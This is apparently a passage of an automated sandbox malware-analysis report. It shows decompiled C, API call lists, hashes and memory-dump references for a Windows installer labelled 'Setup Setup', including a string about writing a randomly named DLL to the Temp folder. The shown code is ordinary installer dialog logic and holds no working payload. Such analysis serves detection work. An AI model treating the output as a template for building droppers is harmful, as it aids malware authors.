                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404197
                                                                    0x0040416b
                                                                    0x00404262
                                                                    0x0040426e
                                                                    0x00404275
                                                                    0x00000000
                                                                    0x00403fc5
                                                                    0x00403fc5
                                                                    0x00403fc8
                                                                    0x00403ffb
                                                                    0x00403ffb
                                                                    0x00403ffd
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403ffd
                                                                    0x00403fca
                                                                    0x00403fce
                                                                    0x00403fd3
                                                                    0x00403fd5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403fe5
                                                                    0x00403fed
                                                                    0x00000000
                                                                    0x00403ff3
                                                                    0x00403e21
                                                                    0x00403e21
                                                                    0x00403e25
                                                                    0x00403e2a
                                                                    0x00403e39
                                                                    0x00403e39
                                                                    0x00403e42
                                                                    0x00403e4b
                                                                    0x00403e56
                                                                    0x00403e56
                                                                    0x00403e62
                                                                    0x00403e7e
                                                                    0x00403e81
                                                                    0x00403e94
                                                                    0x00403e9a
                                                                    0x00403f3d
                                                                    0x00000000
                                                                    0x00403f46
                                                                    0x00403ea0
                                                                    0x00403ead
                                                                    0x00403eaf
                                                                    0x00403eb1
                                                                    0x00403ed0
                                                                    0x00403ed0
                                                                    0x00403ed3
                                                                    0x00403ed8
                                                                    0x00403edb
                                                                    0x00403eeb
                                                                    0x00403eec
                                                                    0x00403eee
                                                                    0x00403f24
                                                                    0x00403f37
                                                                    0x00000000
                                                                    0x00403f37
                                                                    0x00403ef0
                                                                    0x00403ef6
                                                                    0x00403f0f
                                                                    0x00403f14
                                                                    0x00403f16
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403f18
                                                                    0x00403f04
                                                                    0x00403f04
                                                                    0x00403f06
                                                                    0x00403f06
                                                                    0x00000000
                                                                    0x00403f06
                                                                    0x00403ef9
                                                                    0x00403efe
                                                                    0x00000000
                                                                    0x00403efe
                                                                    0x00403edd
                                                                    0x00403ee3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403ee5
                                                                    0x00000000
                                                                    0x00403ee5
                                                                    0x00403ed5
                                                                    0x00000000
                                                                    0x00403ed5
                                                                    0x00403ebb
                                                                    0x00403ec2
                                                                    0x00403ec8
                                                                    0x00403eca
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403eca
                                                                    0x00403e86
                                                                    0x00000000
                                                                    0x00403e64
                                                                    0x00403e6a
                                                                    0x00403e74
                                                                    0x0040427b
                                                                    0x00404281
                                                                    0x00404283
                                                                    0x00404289
                                                                    0x0040428e
                                                                    0x00404294
                                                                    0x00404294
                                                                    0x00404289
                                                                    0x0040429e
                                                                    0x00000000
                                                                    0x0040429e
                                                                    0x00403e62

                                                                    APIs
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E39
                                                                    • ShowWindow.USER32(?), ref: 00403E56
                                                                    • DestroyWindow.USER32 ref: 00403E6A
                                                                    • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403E86
                                                                    • GetDlgItem.USER32 ref: 00403EA7
                                                                    • SendMessageA.USER32 ref: 00403EBB
                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403EC2
                                                                    • GetDlgItem.USER32 ref: 00403F70
                                                                    • GetDlgItem.USER32 ref: 00403F7A
                                                                    • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403F94
                                                                    • SendMessageA.USER32 ref: 00403FE5
                                                                    • GetDlgItem.USER32 ref: 0040408B
                                                                    • ShowWindow.USER32(00000000,?), ref: 004040AC
                                                                    • EnableWindow.USER32(?,?), ref: 004040BE
                                                                    • EnableWindow.USER32(?,?), ref: 004040D9
                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004040EF
                                                                    • EnableMenuItem.USER32 ref: 004040F6
                                                                    • SendMessageA.USER32 ref: 0040410E
                                                                    • SendMessageA.USER32 ref: 00404121
                                                                    • lstrlenA.KERNEL32(0042A8B8,?,0042A8B8,00000000), ref: 0040414B
                                                                    • SetWindowTextA.USER32(?,0042A8B8), ref: 0040415A
                                                                    • ShowWindow.USER32(?,0000000A), ref: 0040428E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                    • String ID:
                                                                    • API String ID: 184305955-0
                                                                    • Opcode ID: 0747cf473462c633210311af9825ea032a0e3c09bf9efde6129466eabca98a82
                                                                    • Instruction ID: d5b7a152eccfdaa35e4c53a1a76e60acfbe2d5449824965e5503988bb7e30882
                                                                    • Opcode Fuzzy Hash: 0747cf473462c633210311af9825ea032a0e3c09bf9efde6129466eabca98a82
                                                                    • Instruction Fuzzy Hash: 34C1E671604204ABDB216F62EE85E2B3BB8FB85349F40053EF641B51F0CB795892DB2D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040443C, Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 91%
                                                                    			E0040443C(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x429884 =  *0x429884 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00404338(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42e3e0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_push(1);
								_t40 =  &_v8; // 0x42e3e0
								E004046E0(_a4,  *_t40);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42f448, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42f448, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x429884 != 0) {
						goto L25;
					} else {
						_t112 =  *0x42a090 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004042F3(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004046BC();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42ec1c; // 0x4eecca
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x42f498;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00404407;
				E004042D1(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E004042D1(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004042F3( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00404306(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x42f454 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				 *0x429884 = 0;
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x429884 = 0;
				return 0;
			}


















                                                                    0x0040444c
                                                                    0x00404571
                                                                    0x004045cd
                                                                    0x004045d1
                                                                    0x0040469e
                                                                    0x004046a0
                                                                    0x004046a0
                                                                    0x004046a6
                                                                    0x004046a6
                                                                    0x004046a9
                                                                    0x00000000
                                                                    0x004046b0
                                                                    0x004045df
                                                                    0x004045e1
                                                                    0x004045eb
                                                                    0x004045f6
                                                                    0x004045f9
                                                                    0x004045fc
                                                                    0x00404607
                                                                    0x0040460a
                                                                    0x00404611
                                                                    0x0040461f
                                                                    0x00404637
                                                                    0x00404639
                                                                    0x0040463b
                                                                    0x00404641
                                                                    0x00404650
                                                                    0x00404652
                                                                    0x00404652
                                                                    0x00404611
                                                                    0x0040465c
                                                                    0x00000000
                                                                    0x00404667
                                                                    0x0040466b
                                                                    0x0040467c
                                                                    0x0040467c
                                                                    0x00404682
                                                                    0x00404690
                                                                    0x00404690
                                                                    0x00000000
                                                                    0x00404694
                                                                    0x0040465c
                                                                    0x0040457c
                                                                    0x00000000
                                                                    0x00404590
                                                                    0x00404596
                                                                    0x0040459c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004045c1
                                                                    0x004045c3
                                                                    0x004045c8
                                                                    0x00000000
                                                                    0x004045c8
                                                                    0x0040457c
                                                                    0x00404452
                                                                    0x00404455
                                                                    0x0040445a
                                                                    0x0040445c
                                                                    0x0040446b
                                                                    0x0040446b
                                                                    0x00404472
                                                                    0x00404475
                                                                    0x00404477
                                                                    0x0040447c
                                                                    0x00404485
                                                                    0x0040448b
                                                                    0x00404497
                                                                    0x0040449a
                                                                    0x004044a3
                                                                    0x004044a8
                                                                    0x004044ab
                                                                    0x004044b0
                                                                    0x004044c7
                                                                    0x004044ce
                                                                    0x004044e1
                                                                    0x004044e4
                                                                    0x004044f9
                                                                    0x00404500
                                                                    0x00404505
                                                                    0x0040450a
                                                                    0x0040450a
                                                                    0x00404519
                                                                    0x00404528
                                                                    0x0040453a
                                                                    0x0040453f
                                                                    0x0040454f
                                                                    0x00404551
                                                                    0x00000000

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                    • String ID: N$B
                                                                    • API String ID: 3103080414-4074832742
                                                                    • Opcode ID: b933b9ecc43e31cfc63bc3248a7489c66971f92386d9d85ac5963e61a52be2be
                                                                    • Instruction ID: c8b3317feb23aa92da8c88ca1c3cf39d399e1714613d550ff25a6b2d3c0ef38e
                                                                    • Opcode Fuzzy Hash: b933b9ecc43e31cfc63bc3248a7489c66971f92386d9d85ac5963e61a52be2be
                                                                    • Instruction Fuzzy Hash: 3761A1B1A40209BFDB109F61CD45F6A3BA9FB84744F00443AFB05BA1D1D7BDA9618F98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 90%
                                                                    			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42f454;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "Setup Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42f448;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                                    0x0040100a
                                                                    0x00401039
                                                                    0x00401047
                                                                    0x0040104d
                                                                    0x00401051
                                                                    0x0040105b
                                                                    0x00401061
                                                                    0x00401064
                                                                    0x004010f3
                                                                    0x00401089
                                                                    0x0040108c
                                                                    0x004010a6
                                                                    0x004010bd
                                                                    0x004010cc
                                                                    0x004010cf
                                                                    0x004010d5
                                                                    0x004010d9
                                                                    0x004010e4
                                                                    0x004010ed
                                                                    0x004010ef
                                                                    0x004010ef
                                                                    0x00401100
                                                                    0x00401105
                                                                    0x0040110d
                                                                    0x00401110
                                                                    0x00401112
                                                                    0x00401118
                                                                    0x0040111f
                                                                    0x00401126
                                                                    0x00401130
                                                                    0x00401142
                                                                    0x00401156
                                                                    0x00401160
                                                                    0x00401165
                                                                    0x00401165
                                                                    0x00401110
                                                                    0x0040116e
                                                                    0x00000000
                                                                    0x00401178
                                                                    0x00401010
                                                                    0x00401013
                                                                    0x00401015
                                                                    0x0040101f
                                                                    0x0040101f
                                                                    0x00000000

                                                                    APIs
                                                                    • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                    • GetClientRect.USER32 ref: 0040105B
                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                    • FillRect.USER32 ref: 004010E4
                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                    • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                    • DrawTextA.USER32(00000000,Setup Setup,000000FF,00000010,00000820), ref: 00401156
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                    • String ID: F$Setup Setup
                                                                    • API String ID: 941294808-1602013819
                                                                    • Opcode ID: cd331e12ae0955bb205525083ccead6a312c2f6528c49d50c92112df1f80047c
                                                                    • Instruction ID: 0ac27d016dd37b64d299d3f81b39716040336c4aee851974846d4d7042c5b915
                                                                    • Opcode Fuzzy Hash: cd331e12ae0955bb205525083ccead6a312c2f6528c49d50c92112df1f80047c
                                                                    • Instruction Fuzzy Hash: CA419C71800249AFCF058FA5DE459AF7FB9FF44314F00802AF991AA1A0C778EA55DFA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00404763, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 274stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 78%
                                                                    			E00404763(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42a090;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040594D(0x3fb, _t146);
					E00406528(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040594D(0x3fb, _t146);
							if(E00405CD3(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E0040624D(0x429888, _t146);
							_t87 = E00406656(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040624D(0x429888, _t146);
								_t89 = E00405C7E(0x429888);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x429888,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x429888) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x429888,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405C2C(0x429888);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x429888) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404BF7(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42ec1c; // 0x4eecca
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404BDF(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x429878);
									} else {
										E00404B1A(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42f504 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E004042F3(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42a8a8 == _t158) {
									E004046BC();
								}
								 *0x42a8a8 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x42a8b8;
							_v60 = E00404AB4;
							_v56 = _t146;
							_v68 = E004062E0(_t146, 0x42a8b8, _t166, 0x429c90, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405BE5(_t146);
								_t125 =  *((intOrPtr*)( *0x42f454 + 0x11c));
								if( *((intOrPtr*)( *0x42f454 + 0x11c)) != 0 && _t146 == "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp") {
									E004062E0(_t146, 0x42a8b8, _t166, 0, _t125);
									if(lstrcmpiA(0x42e3e0, 0x42a8b8) != 0) {
										lstrcatA(_t146, 0x42e3e0);
									}
								}
								 *0x42a8a8 =  *0x42a8a8 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405C52(_t146) != 0 && E00405C7E(_t146) == 0) {
						E00405BE5(_t146);
					}
					 *0x42ec18 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004042D1(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004042D1(_t166);
					E00404306(_t165);
					_t138 = E00406656(8);
					if(_t138 == 0) {
						L53:
						return E00404338(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































                                                                    0x00404763
                                                                    0x00404769
                                                                    0x0040476f
                                                                    0x0040477c
                                                                    0x0040478a
                                                                    0x0040478d
                                                                    0x00404795
                                                                    0x0040479b
                                                                    0x0040479b
                                                                    0x004047a7
                                                                    0x004047aa
                                                                    0x00404818
                                                                    0x0040481f
                                                                    0x004048f6
                                                                    0x004048fd
                                                                    0x0040490c
                                                                    0x0040490c
                                                                    0x00404910
                                                                    0x0040491a
                                                                    0x00404927
                                                                    0x00404929
                                                                    0x00404929
                                                                    0x00404937
                                                                    0x0040493e
                                                                    0x00404945
                                                                    0x00404948
                                                                    0x0040497f
                                                                    0x00404981
                                                                    0x00404987
                                                                    0x0040498c
                                                                    0x00404990
                                                                    0x00404992
                                                                    0x00404992
                                                                    0x004049ae
                                                                    0x00000000
                                                                    0x004049b0
                                                                    0x004049b3
                                                                    0x004049c1
                                                                    0x004049c7
                                                                    0x004049c8
                                                                    0x004049cb
                                                                    0x004049ce
                                                                    0x00000000
                                                                    0x004049ce
                                                                    0x0040494a
                                                                    0x0040494c
                                                                    0x00404950
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404952
                                                                    0x00404952
                                                                    0x0040495f
                                                                    0x00404964
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404968
                                                                    0x0040496a
                                                                    0x0040496a
                                                                    0x00404972
                                                                    0x00404974
                                                                    0x00404977
                                                                    0x0040497a
                                                                    0x0040497d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040497d
                                                                    0x004049da
                                                                    0x004049e4
                                                                    0x004049e7
                                                                    0x004049ea
                                                                    0x004049f1
                                                                    0x004049f1
                                                                    0x004049f3
                                                                    0x004049f3
                                                                    0x004049f8
                                                                    0x004049fa
                                                                    0x00404a02
                                                                    0x00404a09
                                                                    0x00404a0b
                                                                    0x00404a16
                                                                    0x00404a16
                                                                    0x00404a0b
                                                                    0x00404a1d
                                                                    0x00404a26
                                                                    0x00404a30
                                                                    0x00404a38
                                                                    0x00404a53
                                                                    0x00404a3a
                                                                    0x00404a43
                                                                    0x00404a43
                                                                    0x00404a38
                                                                    0x00404a58
                                                                    0x00404a5d
                                                                    0x00404a62
                                                                    0x00404a6b
                                                                    0x00404a6b
                                                                    0x00404a74
                                                                    0x00404a76
                                                                    0x00404a76
                                                                    0x00404a82
                                                                    0x00404a8a
                                                                    0x00404a94
                                                                    0x00404a94
                                                                    0x00404a99
                                                                    0x00000000
                                                                    0x00404a99
                                                                    0x00404948
                                                                    0x004048ff
                                                                    0x00404906
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404906
                                                                    0x00404825
                                                                    0x0040482e
                                                                    0x00404848
                                                                    0x0040484d
                                                                    0x00404857
                                                                    0x0040485e
                                                                    0x0040486a
                                                                    0x0040486d
                                                                    0x00404870
                                                                    0x00404877
                                                                    0x0040487f
                                                                    0x00404882
                                                                    0x00404886
                                                                    0x0040488d
                                                                    0x00404895
                                                                    0x004048ef
                                                                    0x00404897
                                                                    0x00404898
                                                                    0x0040489f
                                                                    0x004048a9
                                                                    0x004048b1
                                                                    0x004048be
                                                                    0x004048d2
                                                                    0x004048d6
                                                                    0x004048d6
                                                                    0x004048d2
                                                                    0x004048db
                                                                    0x004048e8
                                                                    0x004048e8
                                                                    0x00404895
                                                                    0x00000000
                                                                    0x0040484d
                                                                    0x0040483b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404841
                                                                    0x00000000
                                                                    0x004047ac
                                                                    0x004047b9
                                                                    0x004047c2
                                                                    0x004047cf
                                                                    0x004047cf
                                                                    0x004047d6
                                                                    0x004047dc
                                                                    0x004047e5
                                                                    0x004047e8
                                                                    0x004047eb
                                                                    0x004047f3
                                                                    0x004047f6
                                                                    0x004047f9
                                                                    0x004047ff
                                                                    0x00404806
                                                                    0x0040480d
                                                                    0x00404a9f
                                                                    0x00404ab1
                                                                    0x00404813
                                                                    0x00404816
                                                                    0x00000000
                                                                    0x00404816
                                                                    0x0040480d

                                                                    APIs
                                                                    • GetDlgItem.USER32 ref: 004047B2
                                                                    • SetWindowTextA.USER32(00000000,?), ref: 004047DC
                                                                    • SHBrowseForFolderA.SHELL32(?,00429C90,?), ref: 0040488D
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404898
                                                                    • lstrcmpiA.KERNEL32(Error opening file for writing: C:\Users\user~1\AppData\Local\Temp\ri8clfcgml62un.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,0042A8B8,00000000,?,?), ref: 004048CA
